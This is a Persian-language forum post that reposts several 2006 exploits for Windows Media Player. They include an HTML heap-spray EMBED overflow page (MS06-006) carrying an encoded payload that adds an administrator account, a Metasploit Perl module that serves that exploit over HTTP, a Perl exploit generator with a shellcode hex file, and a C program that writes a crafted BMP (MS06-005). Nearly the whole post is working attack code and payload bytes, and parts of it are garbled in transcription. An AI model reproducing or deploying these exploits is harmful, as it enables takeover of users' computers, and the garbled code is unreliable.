
نسخه‌ی کامل: باگ در media player 10
<HTML>
<HEAD>
<TITLE>WMP Plugin EMBED Exploit</TITLE>
<SCRIPT>
// Windows Media Player Plug-In EMBED Overflow Universal Exploit (MS06-006)
// By Matthew Murphy (mattmurphy@kc.rr.com)
//
// DISCLAIMER:
//
// This exploit code is intended only as a demonstration tool for
// educational or testing purposes. It is not intended to be used for any
// unauthorized or illicit purpose. Any testing done with this tool must
// be limited to systems that you own or are explicitly authorized to
// test.
//
// By utilizing or possessing this code, you assume any and all
// responsibility for damage that results. The author will not be held
// responsible, under any circumstances, for damage that arises from your
// possession or use of this code.
//
// Tested:
// Firefox 1.5.0.1
// Windows Media Player 10
// Windows XP SP2 (US)
//
// The Windows Media Player plug-in for non-Microsoft browsers (Firefox,
// Opera, etc.) suffers from an exploitable overflow in its handling of
// EMBED tags. Specifically, a very long SRC property on such a tag can
// lead to an overflow that will corrupt a structured exception handling
// frame.
//
// The SEH frame is the vector of control that I exploit. Fortunately,
// DEP is turned off for non-Microsoft code, so there's no issue there.
// That's really a shame, because such a move would've made an already
// difficult exploit much harder.
//
// One of the reasons the exploit is tough is because the overrun buffer
// (the SRC attribute) is seriously mangled before it is handled by the
// plug-in. In particular, any character with the sign bit set (> 0x7F)
// is replaced.
//
// We could do as the creative wizards like HD Moore suggest and use an
// alphanumeric payload with some cute SEH tricks. Let me rephrase:
// YOU could do as the creative wizards suggest. Meanwhile, I'm perfectly
// content to throw my code in another buffer and get around all the silly
// alpha-numeric sanitation. Sure beats devoting hours to beating it
// with fancy shellcode, all for a PoC I may never release.
//
// Instead, I shamelessly ripped a page from Skylined's book and borrowed
// (and cleaned up) the heap spraying technique. My heap-spray is a lot
// less precise, because the memory layout is a lot more variable. In
// my experience, it took a _HUGE_ block allocation to get the heap I
// wanted to jump to into a reliably-placed location. Hence the atrocity
// of the 16MB of noops below.
//
// Aside from the character restrictions, this is a standard stack-based
// overflow. I simply smash the SEH frame with a pointer to my HUGE heap
// block, which consists of a bunch of 0x41 characters. An INC ECX is a
// functional noop -- so the box takes the slide down the heap into the
// shellcode. The shellcode is a standard Win32 "add administrator"
// payload from Metasploit.
//
// This exploit is a lot of ripping, cleaning and re-implementation, but
// that just goes to show how easy it is to write. So... how about that
// 'Important' rating? A bit perplexing to rate a "click-and-own" as an
// Important... or is it just because nobody would *DARE* run one of those
// "Non-Microsoft" browsers on Windows?
// Spray the heap: start from a short seed of 0x41 bytes and keep doubling it
// until the string is at least 0x1000000 (16 MiB) characters long -- the
// "HUGE block" the header comment relies on to get a reliably-placed region.
// The header explains why 0x41 is used (INC ECX behaves as a noop on x86).
// NOTE(review): "%u41 41" contains a space in this copy; a %u escape with an
// embedded space does not decode, so this looks like forum/transcription
// damage rather than the author's text.
var spray = unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u41 41%u4141");
do {
spray += spray;
} while (spray.length < 0x1000000);
// If this is successful, you can login as a local admin:
//
// User: wmp0wn3d
// Pass: password
// The %u-encoded payload is appended after the slide. The header identifies
// it as a Metasploit Win32 "add administrator" payload; nothing on this page
// verifies that, so treat the bytes as opaque. Fixed by MS06-006 (see header).
spray += unescape(
"%uc933%ue983%ud9c9%ud9ee%u2474%u5bf4%u7381%u9713" +
"%u798c%u839b%ufceb%uf4e2%u646b%u9b3d%u8c97%udef2" +
"%u07ab%u9e05%u8def%u1096%u94d8%uc4f2%u8db7%ud292" +
"%ub81c%u9af2%ubd79%u02b9%u083b%uefb9%u4d90%u96b3" +
"%u4e96%u6f92%ud8ac%u9f5d%u69e2%uc4f2%u8db3%ufd92" +
"%u801c%u1032%u90c8%u7078%u901c%u9af2%u057c%ubf25" +
"%u4f93%u5b48%u07f3%uab39%u4c12%u9701%ucc1c%u1075" +
"%u90e7%u10d4%u84ff%u9292%u0c1c%u9bc9%u8c97%uf3f2" +
"%ud3ab%u6d48%udaf7%u63f0%u4c14%ucb02%u7cff%u9ff3" +
"%ue4c8%u65e1%u821d%u642e%uef70%uff14%ue9b9%ufe01" +
"%ua3b7%ubb1a%ue9f9%ubb0d%uffe2%ue91c%ufbb7%ueb14" +
"%ufba7%ua817%uacf3%ufa09%uffe4%uf40e%ue8e5%ub459" +
"%uc8d6%ubb3d%uaab1%uf559%uf8f2%uf759%ueff8%uf718" +
"%ufef0%uee16%uace7%uff38%ue5fa%uf217%uf8e4%ufa0b" +
"%ue3e3%ue80b%ufbb7%ueb14%ufba7%ua817%uacf3%uda56" +
"%uc8d3%u9b79"
);
</SCRIPT>
</HEAD>
<BODY>
<EMBED
SRC="-----------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
--AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAA ANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWX
XXXYYYYZZZZ000011112222333344445555666677778888999 9.wmv"></EMBED>
</BODY>
</HTML>





Details: ExploitAlert Topic: MS Windows Media Player 9 Plugin Overflow Exploit (MS06-006) (meta)
ExploitAlert Id : 321
Credit : Metasploit plugin
Date : 20.2.2006
Exploit Code :

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::wmp_plugin_ms06_006;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;

# Advanced options as [default, description]. Both default to on, so a
# response is gzip-compressed and chunk-encoded unless the user turns them off.
my $advanced = {
    'Gzip'    => [ 1, 'Enable gzip content encoding' ],
    'Chunked' => [ 1, 'Enable chunked transfer encoding' ],
};

# Module metadata consumed by the framework. The fields a defender will
# care about are Payload/BadChars (what the plug-in mangles), Targets (the
# fallback wmp.dll address) and Refs (CVE-2006-0005 / MS06-006).
my $info =
{
'Name' => 'Windows Media Player Plugin MS06-006 Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' =>
[
'H D Moore <hdm [at] metasploit.com',
],

'Description' =>
Pex::Text::Freeform(qq{
This module exploits a vulnerability in the Windows Media Player plugin
for non-Microsoft web browsers. This module has been tested with Windows
Media Player 9 on Windows 2000 SP4, Windows XP SP2, and Windows 2003 SP0
(Firefox 1.5 and Opera 8.5).
}),

'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winxp', 'win2003' ],
'Priv' => 0,

# GETPCTYPE 'ecx': the getpc stub built in HandleHttpClient ends with
# push eax / pop ecx, i.e. the payload's own address is handed over in ECX.
'AutoOpts' => { 'EXITFUNC' => 'process', 'GETPCTYPE' => 'ecx' },
'UserOpts' =>
{
'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
# NOTE(review): REALHOST is declared here but nothing else in this file reads it.
'REALHOST' => [ 0, 'HOST', 'External address to use for redirects (NAT)' ],
},

'Payload' =>
{
# give some stack space, align esp
'Space' => 1024,
# Bytes the encoder must avoid: NUL, '"' (the src attribute delimiter) and
# every byte >= 0x80, which the plug-in replaces before the overflow happens.
# NOTE(review): "x00x22" has lost its backslashes in this copy (presumably "\x00\x22").
'BadChars' => "x00x22".join('', map { $_=chr($_) } (0x80 .. 0xff)),
# No framework NOP sled: HandleHttpClient builds its own 4000-byte filler.
'MinNops' => 0,
'MaxNops' => 0,
},
'Refs' =>
[
['CVE', '2006-0005'],
['OSVDB', '23132'],
['MSB', 'MS06-006'],
['BID', '15130'],
],

'DefaultTarget' => 0,
# Fallback address used when the User-Agent matches none of the cases in
# HandleHttpClient; it is the same wmp.dll 9.00.00.2980 value used there for NT/2000.
'Targets' =>
[
[ 'Automatic - WMP 9.0', 0x07694b1e ]
],

'Keys' => [ 'wmp' ],

'DisclosureDate' => 'Feb 14 2006',
};

# Constructor: hands the static Info/Advanced tables to the framework
# base-class constructor together with any caller-supplied arguments.
sub new {
    my ($class, @args) = @_;
    my $self = $class->SUPER::new({ 'Info' => $info, 'Advanced' => $advanced }, @args);
    return $self;
}

# Entry point: bind the local HTTP listener and hand every accepted
# connection to HandleHttpClient(). The accept loop only ends when
# accept() fails, so this never returns during normal operation.
sub Exploit
{
    my $self = shift;

    my $listener = IO::Socket::INET->new(
        LocalHost => $self->GetVar('HTTPHOST'),
        LocalPort => $self->GetVar('HTTPPORT'),
        ReuseAddr => 1,
        Listen    => 1,
        Proto     => 'tcp'
    );

    # Listener creation failed (port in use, no permission, ...)
    unless (defined $listener) {
        $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
        return;
    }

    # A wildcard bind address is useless in a URL; presumably SourceIP()
    # returns the local address that routes toward 1.2.3.4 -- verify against Pex::Utils.
    my $display_host = $self->GetVar('HTTPHOST');
    if ($display_host eq '0.0.0.0') {
        $display_host = Pex::Utils::SourceIP('1.2.3.4');
    }

    $self->PrintLine("
[*] Waiting for connections to http://" . $display_host . ":" . $self->GetVar('HTTPPORT') . "/");

    while (1) {
        my $conn = $listener->accept();
        last unless defined $conn;
        $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($conn));
    }

    return;
}

# Serve one HTTP client: read the request line and headers, pick the
# per-platform wmp.dll address from the User-Agent, build the EMBED page
# and send it through BuildResponse(). $fd is the framework socket wrapper
# handed over by Exploit(); it is closed here before returning.
sub HandleHttpClient
{
my $self = shift;
my $fd = shift;

# Set the remote host information
my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);


# Read the HTTP command
# (the 10 is presumably a read timeout in seconds -- confirm against Msf::Socket::Tcp)
my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
my $agent;

# Read in the HTTP headers
# Only the User-Agent value is kept; every other header is discarded.
# NOTE(review): the substitution below reads "s+" in this copy; the
# backslash of "\s+" has presumably been lost in transcription, the same
# damage that turned "\r\n" into "rn" elsewhere in this module.
while ((my $line = $fd->RecvLine(10))) {

$line =~ s/^s+|s+$//g;

my ($var, $val) = split(/:/, $line, 2);

# Break out if we reach the end of the headers
last if (not defined($var) or not defined($val));

$agent = $val if $var =~ /User-Agent/i;
}


my $addr;

##
# XXX Does not detect Windows SP levels or WMP version
##
# Each address is tied to one wmp.dll build (see the inline comments) but is
# chosen purely from the "Windows NT x.y" token, so a client on another
# service pack or WMP build likely gets a wrong address -- the XXX above.

# Windows NT and Windows 2000 systems
if ($agent =~ /Windows NT [45].0/) {
$self->PrintLine("
[*]Targetting WMP v9 on NT/2000...");
$addr = 0x07694b1e; # wmp.dll v9.00.00.2980
}

# Windows XP SP2
if ($agent =~ /Windows NT 5.1/) {
$self->PrintLine("
[*]Targetting WMP v9 on XP SP2...");
$addr = 0x4b5d5c74; # wmp.dll v9.00.00.3250
}

# Windows 2003 SP0
if ($agent =~ /Windows NT 5.2/) {
$self->PrintLine("
[*]Targetting WMP v9 on 2003 SP0...");
$addr = 0x585a6052; # wmp.dll v9.00.00.2991
}


my $target = $self->Targets->[$self->GetVar('TARGET')];
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
# 4000 bytes of filler; the pieces that matter are patched in at fixed offsets
# below. Together with the ~3 KB of random X- headers from RandomHeaders() this
# makes the response easy to recognise on the wire.
my $pattern = "C" x 4000;

# No User-Agent match: fall back to the configured target's address
$addr = $target->[1] if ! $addr;

# We can't use SEH getpc from inside a SEH handler on XP SP2 >
# So we do it like a drunk ninja.
# NOTE(review): the "x58x58x58" etc. literals have lost their "\x"
# backslashes in this copy; the inline comments name the intended opcodes.
my $getpc =
"x58x58x58". # pop eax, pop eax, pop eax
"x05x18x29x29x29". # add eax,0x29292917
"x2dx01x29x29x29". # sub eax,0x29292901
"x50x59"; # push eax, pop ecx

# Layout inside $pattern (byte offsets from the start of the src value):
#   2082..2085  "ABC="                      (see the inline comment)
#   2086..2089  $addr, little-endian        (pack 'V')
#   2090..      getpc stub, immediately followed by the encoded payload
substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr]
substr($pattern, 2086, 4, pack('V', $addr));
substr($pattern, 2090, length($getpc), $getpc);
substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode);

# NOTE(review): the inner double quotes are unescaped in this copy, which is a
# syntax error as printed; presumably \" in the original.
my $content = "<html><body><embed
type="application/x-mplayer2"
src="$pattern.wmv"></body></html>";

$self->PrintLine("
[*]HTTP Client connected from $rhost:$rport, sending
".length($shellcode)." bytes of payload...");

$fd->Send($self->BuildResponse($content));

# Prevents IE from throwing an error in some cases
# (a 100 ms pause before the socket is closed)
select(undef, undef, undef, 0.1);

$fd->Close();
}

# Produce at least 3072 bytes of throw-away "X-<name>: <value>" header lines:
# names are 5..34 and values 5..260 random alphanumeric characters. Every
# response therefore carries ~3 KB of random X- headers ahead of the real
# ones (see BuildResponse) -- a recognisable trait for anyone inspecting traffic.
# NOTE(review): "rn" at the end of each line has lost its backslashes in this
# copy (intended "\r\n"); the same damage appears throughout the file.
sub RandomHeaders {
my $self = shift;
my $head = '';

while (length($head) < 3072) {
$head .= "X-" .
Pex::Text::AlphaNumText(int(rand(30) + 5)) . ': ' .
Pex::Text::AlphaNumText(int(rand(256) + 5)) ."rn";
}
return $head;
}


# Wrap $content in an HTTP/1.1 200 response. Order on the wire: status line,
# RandomHeaders() padding, Content-Type, then -- depending on the Gzip and
# Chunked advanced options -- a gzip'd body and/or chunked framing.
# Content-Length (computed after compression) and "Connection: close" are only
# sent when chunking is off; otherwise the peer relies on the caller closing
# the socket. Returns the complete response as one string.
# NOTE(review): every "rn" here is a "\r\n" whose backslashes were lost in this copy.
sub BuildResponse {
my ($self, $content) = @_;

my $response =
"HTTP/1.1 200 OKrn" .
$self->RandomHeaders() .
"Content-Type: text/htmlrn";

if ($self->GetVar('Gzip')) {
$response .= "Content-Encoding: gziprn";
$content = $self->Gzip($content);
}
if ($self->GetVar('Chunked')) {
$response .= "Transfer-Encoding: chunkedrn";
$content = $self->Chunk($content);
} else {
$response .= 'Content-Length: ' . length($content) . "rn" .
"Connection: closern";
}

$response .= "rn" . $content;

return $response;
}

# Apply chunked transfer encoding with deliberately tiny, random chunk sizes
# (1..10 bytes each), finishing with the "0" terminator chunk. Content
# inspection therefore has to de-chunk the body before it sees it in one piece.
# Returns the framed body; $content is consumed by the 4-argument substr.
# NOTE(review): "rn" is "\r\n" with the backslashes lost in this copy.
sub Chunk {
my ($self, $content) = @_;

my $chunked;
while (length($content)) {
my $chunk = substr($content, 0, int(rand(10) + 1), '');
$chunked .= sprintf('%x', length($chunk)) . "rn$chunkrn";
}
$chunked .= "0rnrn";

return $chunked;
}

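# Compress $data by piping it through the external gzip binary at a random
# compression level (5..9, so the compressed bytes vary between requests).
# Returns the compressed data as one string. The child is reaped before
# returning; the original left a zombie gzip behind for every response served
# by the accept loop in Exploit().
# Limitation kept from the original: all input is written before any output
# is read, so inputs larger than the pipe buffer could deadlock -- the pages
# built here are a few KB, well below that.
sub Gzip {
    my ($self, $data) = @_;
    my $level = int(rand(5)) + 5;

    # $err undef: IPC::Open3 sends the child's stderr to the same handle as
    # stdout, so any gzip diagnostic would end up inside the response body.
    my ($wtr, $rdr, $err);
    my $pid = open3($wtr, $rdr, $err, 'gzip', '-' . $level, '-c', '--force');
    print $wtr $data;
    close($wtr);

    local $/;
    my $compressed = <$rdr>;
    close($rdr);
    waitpid($pid, 0);

    return $compressed;
}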

1;





Details: ExploitAlert Topic: MS Windows Media Player Plugin Overflow Exploit (MS06-006) (3)
ExploitAlert Id : 334
Credit : Matthew Murphy
Date : 24.2.2006
Exploit Code :

#!/usr/bin/perl
#
# wmp-profiteer.pl
# Exploiting 'Non-Critical' Media Player Vulnerabilities for Fun and Profit
# By Matthew Murphy (mattmurphy@kc.rr.com)
#
# It's come to my attention that the HTML versions of the exploit posted on
# several sites have become mangled. Notables include SecuriTeam and FrSIRT.
# Neither one, though, can beat SecurityFocus, whose links to the exploits
# for this issue are both 404s.
#
# I haven't updated the underlying exploit methodology -- it's still a shameless
# rip of Skylined's heap spray technique, but now the shellcode can be
# customized!
#
# The usage of this tool is as follows:
#
# wmp-profiteer.pl [shellcode]
#
# The shellcode that comes with this has the same payload as the original.
# If it's successful against you, you'll have an administrator account named
# 'wmp0wn3d' with a password of 'password'. This, of course, assumes that
# you're running the vulnerable application as an administrator. There's a
# lesson in that: run as a Limited User or at least tie down your browsers
# with Software Restriction.
#
# This will drop 'wmp-exploit.html' in the current directory. When the HTML
# document is opened locally or viewed remotely by a vulnerable web browser
# (Firefox on Windows), the exploit code will run and gain control of the
# browser.
#
# The standard disclaimer from the original exploit still applies, with some
# changes:
#
# This exploit code is intended only as a demonstration tool for
# educational or testing purposes. It is not intended to be used for any
# unauthorized or illicit purpose. Any testing done with this tool OR ANY
# PRODUCT OR ALTERATION THEREOF must be limited to systems that you own or
# are explicitly authorized to test.
#
# By utilizing or possessing this code, you assume any and all
# responsibility for damage that results. The author will not be held
# responsible, under any circumstances, for damage that arises from your
# possession or use of this code.

# The generated page is assembled from three literal fragments: $part1 (HTML
# head and the heap-spray loop, up to the opening of the payload string),
# $part2 (closes the script and opens the EMBED SRC attribute) and $part3
# (closes the attribute and the document). The %u-encoded payload and the
# SRC padding are printed between them below.
# NOTE(review): the inner double quotes in these three strings are unescaped
# in this copy (a syntax error as printed); presumably \" in the original.
$part1 =
"<!DOCTYPE HTML PUBLIC "-//W3C DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>WMP EMBED Exploit by Matthew Murphy</TITLE>
<SCRIPT>
var spray = unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u41 41%u4141");
do {
spray += spray;
} while (spray.length < 0x1000000);
spray += unescape("";

$part2 =
"");
</SCRIPT>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<EMBED SRC="";

$part3 =
""></EMBED>
</BODY>
</HTML>";

# Usage check. NOTE(review): the message is printed but the script carries on
# regardless (there is no exit), so a missing argument reaches the open() of
# $ARGV[0] below.
if (@ARGV != 1) {
print STDERR "Usage: $0 [shellcode file]";
}

# Output file is always ./wmp-exploit.html, truncated if it exists
# (two-argument open with a bareword handle; the die message contains a
# literal line break in this copy).
open(EXPLOIT, ">./wmp-exploit.html") or die "Cannot open 'wmp-exploit.html
for writing.";
print EXPLOIT $part1;

# Read the raw shellcode two bytes at a time and emit each pair as one %uXXYY
# unit with the bytes swapped (little-endian 16-bit units for unescape()).
# A lone trailing byte is emitted zero-padded in the high byte, preceded by a
# bare "%u00".
open(SHELLCODE, $ARGV[0]) or die "Shellcode file not found.";
while (!eof(SHELLCODE)) {
$ch1 = getc(SHELLCODE);
if (eof(SHELLCODE)) {
print EXPLOIT "%u00";
print EXPLOIT sprintf("%%u00%.2x", ord($ch1));
} else {
$ch2 = getc(SHELLCODE);
print EXPLOIT sprintf("%%u%.2x%.2x", ord($ch2), ord($ch1));
}
}
close(SHELLCODE);

# EMBED SRC value: 2038 dashes of filler followed by the marker pattern and a
# ".wmv" suffix. NOTE(review): "x05" has lost its backslash in this copy
# (presumably "\x05"), and the long literal is wrapped/garbled ("&qu ot;")
# by the forum.
print EXPLOIT $part2;
print EXPLOIT "-"x2038;
print EXPLOIT "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLL" ;
print EXPLOIT "AAAx05";
print EXPLOIT "NNNNOOOO";
print EXPLOIT "AAAx05";
print EXPLOIT
"QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ000011112 2223333444455556666777788889999.wmv&qu
ot;;
print EXPLOIT $part3;
close(EXPLOIT);

----------------------------------------------- shellcode.hex -----------------------------------------

:020000040000FA
:100000002BC983E9C9D9EED97424F45B8173132118
:10001000C414F183EBFCE2F4DD2C50F121C49FB455
:100020001D4F68F459C5FB7A6EDC9FAE01C5FFB861
:10003000AAF09FF0CFF5D4688D40D4852605DEFC6C
:100040002006FF051A9030F554219FAE05C5FF9795
:10005000AAC85F7A7ED8151AAAD89FF0CA4D48D58B
:1000600025072531454F54C1A4046CFDAA84187A94
:1000700051D8B97A49CCFFF8AA44A4F121C49F9978
:100080001D9B250741929D09A2046FA149349EF54D
:100090007EAC8C0FABCA430EC6A779950FA16C94AA
:1000A00001EB77D14FA160D154B7718301B379814E
:1000B00011B37AC245E4649052B7639E53A034DE14
:1000C000608050D107E2349F44B0349D4EA7759DA7
:1000D00046B67B8451E455954CAD7A9852B0669003
:1000E00055AB668201B3798111B37AC245E43BB066
:0400F000658014F122
:00000001FF





Details: ExploitAlert Topic: Windows Media Player 7.1 <= 10 BMP Heap Overflow PoC (MS06-005)
ExploitAlert Id : 310
Credit : ATmaCA
Date : 16.2.2006
Exploit Code :

/*
* For Remote Exploration (hint):
* http://www.spyinstructors.com/atmaca...remote_poc.asx
*/

/*
*
* Windows Media Player BMP Heap Overflow (MS06-005)
* Bug discovered by eEye - http://www.eeye.com/html/research/ad...D20060214.html
* Exploit coded by ATmaCA
* Web: http://www.spyinstructors.com && http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to Kozan
*
*/

/*
*
* Systems Affected:
* Microsoft Windows Media Player 7.1 through 10
*
* Windows NT 4.0
* Windows 98 / ME
* Windows 2000 SP4
* Windows XP SP1 / SP2
* Windows 2003
*
*
*/

/*
*
* In this vulnerability,payload is loaded to different places in memory each time.
* but some time is very easy to call our shell code :
* http://www.spyinstructors.com/atmaca/research/wmp.JPG
* but some times not =) because of ,no shell this time
*
*/

/*
*
* Microsoft has released a patch for this vulnerability.
* The patch is available at:
* http://www.microsoft.com/technet/sec.../ms06-005.mspx
*
*/

#include <windows.h>
#include <stdio.h>

#define BITMAP_FILE_SIZE 0xA8D2
#define BITMAP_FILE_NAME "crafted.bmp"

#pragma pack( push )
#pragma pack( 1 )

// bitmap file format - http://atlc.sourceforge.net/bmp.html
//File information header provides general information about the file
// 14 bytes on disk thanks to pack(1); main() fills the fields as noted.
// NOTE(review): the tag _BitmapFileHeader starts with an underscore followed
// by an uppercase letter, an identifier reserved for the implementation.
typedef struct _BitmapFileHeader {
WORD bfType;        // signature; main() writes 0x4D42 ("BM")
DWORD bfSize;       // total file size; main() writes BITMAP_FILE_SIZE (0xA8D2)
WORD bfReserved1;   // main() writes 0
WORD bfReserved2;   // main() writes 0
DWORD bfOffBits;    // byte offset of the pixel data; main() deliberately writes 0 (see its "eEye - MAGIC" comment)
} BMPFHEADER;

//Bitmap information header provides information specific to the image data
// 40 bytes on disk thanks to pack(1); main() fills the fields as noted.
// NOTE(review): _BitmapInfoHeader is likewise a reserved identifier.
typedef struct _BitmapInfoHeader{
DWORD biSize;           // main() writes 0x28 (40, this header's size)
LONG biWidth;           // main() writes 0x91
LONG biHeight;          // main() writes 0x63
WORD biPlanes;          // main() writes 1
WORD biBitCount;        // main() writes 0x18 (24 bpp)
DWORD biCompression;    // main() writes 0
DWORD biSizeImage;      // main() writes 0xA89C, which is 0x91 x 0x63 at 24 bpp with rows padded to 4 bytes
LONG biXPelsPerMeter;   // main() writes 0
LONG biYPelsPerMeter;   // main() writes 0
DWORD biClrUsed;        // main() writes 0
DWORD biClrImportant;   // main() writes 0
} BMPIHEADER;

#pragma pack( pop )

/*
 * Writes BITMAP_FILE_NAME ("crafted.bmp") in the current directory: the
 * 14-byte file header, the 40-byte info header, then 0x41 filler up to
 * BITMAP_FILE_SIZE, with the final byte forced to 0x00. The header values
 * are the whole point of the PoC (see the "eEye - MAGIC" note below); the
 * pixel data is never anything but filler.
 *
 * NOTE(review): several things in this listing look like transcription
 * damage rather than the author's code -- the printf literals split across
 * lines below and "si zeof" in the second memcpy -- so it does not compile
 * as shown.
 * NOTE(review): exit() and malloc() come from <stdlib.h>, which is not
 * included; whether <windows.h> pulls it in depends on the toolchain.
 * Returns 1 on success (the usual convention is 0) and exits with status 1
 * if the output file cannot be opened.
 */
int main(void)
{
FILE *File;
BMPFHEADER *bmp_fheader;
BMPIHEADER *bmp_iheader;
char *pszBuffer;

printf("\nWindows Media Player BMP Heap Overflow (MS06-005)");
printf("\nBug discovered by eEye");
printf("\nExploit coded by ATmaCA");
printf("\nWeb: http://www.spyinstructors.com &&
http://www.atmacasoft.com");
printf("\nE-Mail: atmaca@icqmail.com");
printf("\nCredit to Kozan");


if ( (File = fopen(BITMAP_FILE_NAME,"w+b")) == NULL ) {
printf("\n [E:] fopen()");
exit(1);
}

// NOTE(review): none of the three allocations is checked for NULL and none
// is freed; the process exits right after, so only the missing NULL check
// matters in practice.
bmp_fheader=(BMPFHEADER*)malloc(sizeof(BMPFHEADER) );
bmp_iheader=(BMPIHEADER*)malloc(sizeof(BMPIHEADER) );
pszBuffer = (char*)malloc(BITMAP_FILE_SIZE);

// Everything the two headers do not overwrite stays 0x41 filler
memset(pszBuffer,0x41,BITMAP_FILE_SIZE);

bmp_fheader->bfType = 0x4D42; // "BM"
bmp_fheader->bfSize = BITMAP_FILE_SIZE;
bmp_fheader->bfReserved1 = 0x00;
bmp_fheader->bfReserved2 = 0x00;

// eEye - MAGIC
// Antiviruses will get the signature from here!!!
// A pixel-data offset of 0 points back at the file header itself instead of
// past the 54 bytes of headers that the commented-out expression would give.
bmp_fheader->bfOffBits = 0x00; //( sizeof(BMPFHEADER) + sizeof(BMPIHEADER) );

bmp_iheader->biSize = 0x28;
bmp_iheader->biWidth = 0x91;
bmp_iheader->biHeight = 0x63;
bmp_iheader->biPlanes = 0x01;
bmp_iheader->biBitCount = 0x18;
bmp_iheader->biCompression = 0x00;
// 0x91 x 0x63 pixels at 24 bpp, rows padded to 4 bytes, is exactly 0xA89C,
// and 0xA89C + 54 bytes of headers = BITMAP_FILE_SIZE (0xA8D2) -- so apart
// from bfOffBits the headers describe the file consistently.
bmp_iheader->biSizeImage = 0xA89C;
bmp_iheader->biXPelsPerMeter = 0x00;
bmp_iheader->biYPelsPerMeter = 0x00;
bmp_iheader->biClrUsed = 0x00;
bmp_iheader->biClrImportant = 0x00;

// Copy both headers over the start of the filler (sizes are 14 and 40 under pack(1))
memcpy(pszBuffer,bmp_fheader,sizeof(BMPFHEADER));
// NOTE(review): "si zeof" below is a transcription artifact; the intent is sizeof(BMPIHEADER)
memcpy(pszBuffer+sizeof(BMPFHEADER),bmp_iheader,si zeof(BMPIHEADER));

// BITMAP_FILE_SIZE-1 bytes of buffer, then a single 0x00 so the file ends in
// a NUL; neither fwrite result is checked.
fwrite(pszBuffer, BITMAP_FILE_SIZE-1, 1,File);
fwrite("\x00", 1,1, File); //Terminator

fclose(File);
printf("\n\n" BITMAP_FILE_NAME" has been created in the current
directory.\n");

return 1;
}
Eblis-248 جان ممنون، فقط اگه یه توضیح هم می‌دادی عالی می‌شد.